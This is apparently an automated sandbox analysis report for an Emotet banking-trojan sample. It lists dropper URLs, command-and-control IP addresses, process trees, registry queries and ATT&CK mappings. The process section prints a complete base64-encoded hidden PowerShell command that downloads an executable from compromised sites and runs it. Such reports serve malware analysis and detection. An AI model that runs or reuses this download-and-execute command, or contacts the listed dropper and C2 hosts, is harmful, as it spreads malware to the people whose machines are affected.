emotet | c984833db58812ed08f1b0560576ec19bfec60b0a8103292c206042ef12007fc

General

Target

c984833db58812ed08f1b0560576ec19bfec60b0a8103292c206042ef12007fc
Sample

200117-vf11ag677a
SHA256

c984833db58812ed08f1b0560576ec19bfec60b0a8103292c206042ef12007fc

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://amelano.net/wp-includes/css/dist/2ew/

exe.dropper

http://911concept.com/images/i6ngX5/

exe.dropper

http://ayonschools.com/UBkoqn/

exe.dropper

http://beech.org/wayne/lldo/

exe.dropper

http://firelabo.com/wp-includes/mf6f4/

Extracted

Family

emotet

C2

68.172.243.146:80

64.40.250.5:80

81.17.92.70:80

91.250.96.22:8080

37.187.72.193:8080

104.131.44.150:8080

167.71.10.37:8080

37.139.21.175:8080

73.11.153.178:8080

192.241.255.77:8080

91.205.215.66:443

201.229.45.222:8080

46.105.131.87:80

188.0.135.237:80

78.142.114.69:80

64.53.242.181:8080

93.147.141.5:443

101.187.134.207:8080

72.189.57.105:80

190.117.126.169:80

rsa_pubkey.plain

Signatures

Drops file in System32 directory 1 IoCs

Processes:

267.exe

description ioc process

File renamed C:\Users\Admin\267.exe => C:\Windows\SysWOW64\wsatlua.exe 267.exe
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

WINWORD.EXE267.exe267.exewsatlua.exewsatlua.exe

pid process

5004 WINWORD.EXE
4440 267.exe
3824 267.exe
4396 wsatlua.exe
4360 wsatlua.exe
Process spawned unexpected child process 1 IoCs

Processes:

Powershell.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4612 332 Powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

Powershell.exe

pid process

4612 Powershell.exe
Executes dropped EXE 4 IoCs

Processes:

267.exe267.exewsatlua.exewsatlua.exe

pid process

4440 267.exe
3824 267.exe
4396 wsatlua.exe
4360 wsatlua.exe
Suspicious behavior: EmotetMutantsSpam 2 IoCs

Processes:

267.exewsatlua.exe

pid process

3824 267.exe
4360 wsatlua.exe

description	ioc	process
File renamed	C:\Users\Admin\267.exe => C:\Windows\SysWOW64\wsatlua.exe	267.exe

pid	process
5004	WINWORD.EXE
4440	267.exe
3824	267.exe
4396	wsatlua.exe
4360	wsatlua.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4612	332	Powershell.exe

pid	process
4612	Powershell.exe

pid	process
4440	267.exe
3824	267.exe
4396	wsatlua.exe
4360	wsatlua.exe

pid	process
3824	267.exe
4360	wsatlua.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Emotet
Emotet is a trojan that is primarily spread through spam emails
trojan banker emotet
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

5004 WINWORD.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

Powershell.exe

description pid process

Token: SeDebugPrivilege 4612 Powershell.exe

pid	process
5004	WINWORD.EXE

description	pid	process
Token: SeDebugPrivilege	4612	Powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

Powershell.exe267.exewsatlua.exe

description	pid	process	target process
PID 4612 wrote to memory of 4440	4612	Powershell.exe	267.exe
PID 4440 wrote to memory of 3824	4440	267.exe	267.exe
PID 4396 wrote to memory of 4360	4396	wsatlua.exe	wsatlua.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c984833db58812ed08f1b0560576ec19bfec60b0a8103292c206042ef12007fc.doc" /o ""
1⤵
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
- Enumerates system info in registry
PID:5004

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABXAGgAaAB2AGQAeAByAGIAcQB3AGwAawBmAD0AJwBBAG8AawBqAHMAdgBuAGcAcgBsAGsAZABrACcAOwAkAEQAYQBiAHcAZwByAGwAcwBjAGIAbgB1AGQAIAA9ACAAJwAyADYANwAnADsAJABXAGkAcwBhAGwAeABuAGcAeQBtAHkAawA9ACcASABmAHIAZABhAHoAagB1AG0AYwBqAGIAcAAnADsAJABQAHEAegBvAHEAeABzAGYAaQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARABhAGIAdwBnAHIAbABzAGMAYgBuAHUAZAArACcALgBlAHgAZQAnADsAJABUAGgAdQBwAGEAbwBiAG4AegBuAGMAYgA9ACcARwB3AGMAZwB3AGUAZQBtAGcAZgAnADsAJABSAHQAZwBsAHAAagBiAHUAbAA9ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAATgBFAFQALgBXAEUAYgBjAGwASQBFAE4AdAA7ACQAWQB6AHUAZABqAGYAbQBrAHkAPQAnAGgAdAB0AHAAOgAvAC8AYQBtAGUAbABhAG4AbwAuAG4AZQB0AC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AYwBzAHMALwBkAGkAcwB0AC8AMgBlAHcALwAqAGgAdAB0AHAAOgAvAC8AOQAxADEAYwBvAG4AYwBlAHAAdAAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBpADYAbgBnAFgANQAvACoAaAB0AHQAcAA6AC8ALwBhAHkAbwBuAHMAYwBoAG8AbwBsAHMALgBjAG8AbQAvAFUAQgBrAG8AcQBuAC8AKgBoAHQAdABwADoALwAvAGIAZQBlAGMAaAAuAG8AcgBnAC8AdwBhAHkAbgBlAC8AbABsAGQAbwAvACoAaAB0AHQAcAA6AC8ALwBmAGkAcgBlAGwAYQBiAG8ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAG0AZgA2AGYANAAvACcALgAiAFMAYABQAEwAaQB0ACIAKAAnACoAJwApADsAJABDAHcAcAByAGoAaABjAG8AZQBmAD0AJwBaAGcAZgBzAHIAcQB5AHkAZgBqAGcAZgAnADsAZgBvAHIAZQBhAGMAaAAoACQAUgBmAHgAdgBmAHcAdwBvAGMAeQBjAHcAdwAgAGkAbgAgACQAWQB6AHUAZABqAGYAbQBrAHkAKQB7AHQAcgB5AHsAJABSAHQAZwBsAHAAagBiAHUAbAAuACIAZABPAHcAYABOAEwAYABPAGEAZABGAGAAaQBMAEUAIgAoACQAUgBmAHgAdgBmAHcAdwBvAGMAeQBjAHcAdwAsACAAJABQAHEAegBvAHEAeABzAGYAaQApADsAJABUAGcAbgBoAGEAbwBuAHAAbQBlAHgAaQA9ACcAWQBwAGYAYQBzAGcAaABwAHkAbAB1AHEAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACAAJABQAHEAegBvAHEAeABzAGYAaQApAC4AIgBMAGUAYABOAEcAdABIACIAIAAtAGcAZQAgADIANQA4ADUAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABBAFIAVAAiACgAJABQAHEAegBvAHEAeABzAGYAaQApADsAJABTAHEAawBrAG4AbwB3AGEAdwA9ACcASQBqAHUAYgB2AGoAbQBkAHoAcQBkACcAOwBiAHIAZQBhAGsAOwAkAEEAbwBlAGgAYgBuAGsAaABqAGoAdAA9ACcAWABxAGcAYgBvAGoAdgBjAHkAeAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABRAGsAZABlAGQAcABwAGsAeABrAHoAawBvAD0AJwBVAGkAeQBhAGEAbQBpAG0AdwB4ACcA
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4612
- C:\Users\Admin\267.exe
  "C:\Users\Admin\267.exe"
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4440
- - C:\Users\Admin\267.exe
    --253d0d11
    3⤵
    - Drops file in System32 directory
    - Suspicious use of SetWindowsHookEx
    - Executes dropped EXE
    - Suspicious behavior: EmotetMutantsSpam
    PID:3824

C:\Windows\SysWOW64\wsatlua.exe
"C:\Windows\SysWOW64\wsatlua.exe"
1⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4396
- C:\Windows\SysWOW64\wsatlua.exe
  --907a307f
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Executes dropped EXE
  - Suspicious behavior: EmotetMutantsSpam
  PID:4360

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\403f0cc78adafaecdb503a6c6424923d_293fa5bd-edfb-4bba-800e-a7dce3ea3438

Download Submit
C:\Users\Admin\267.exe

Download Submit
C:\Users\Admin\267.exe

Download Submit
C:\Users\Admin\267.exe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438

Download Submit
C:\Windows\SysWOW64\wsatlua.exe

Download Submit
C:\Windows\SysWOW64\wsatlua.exe

Download Submit
memory/3824-11-0x0000000000400000-0x00000000004A7000-memory.dmp

Filesize
668KB

Download
memory/3824-10-0x0000000002180000-0x0000000002197000-memory.dmp

Filesize
92KB

Download
memory/4360-16-0x0000000000CC0000-0x0000000000CD7000-memory.dmp

Filesize
92KB

Download
memory/4360-17-0x0000000000400000-0x00000000004A7000-memory.dmp

Filesize
668KB

Download
memory/4396-13-0x0000000000E40000-0x0000000000E57000-memory.dmp

Filesize
92KB

Download
memory/4440-7-0x0000000000550000-0x0000000000567000-memory.dmp

Filesize
92KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads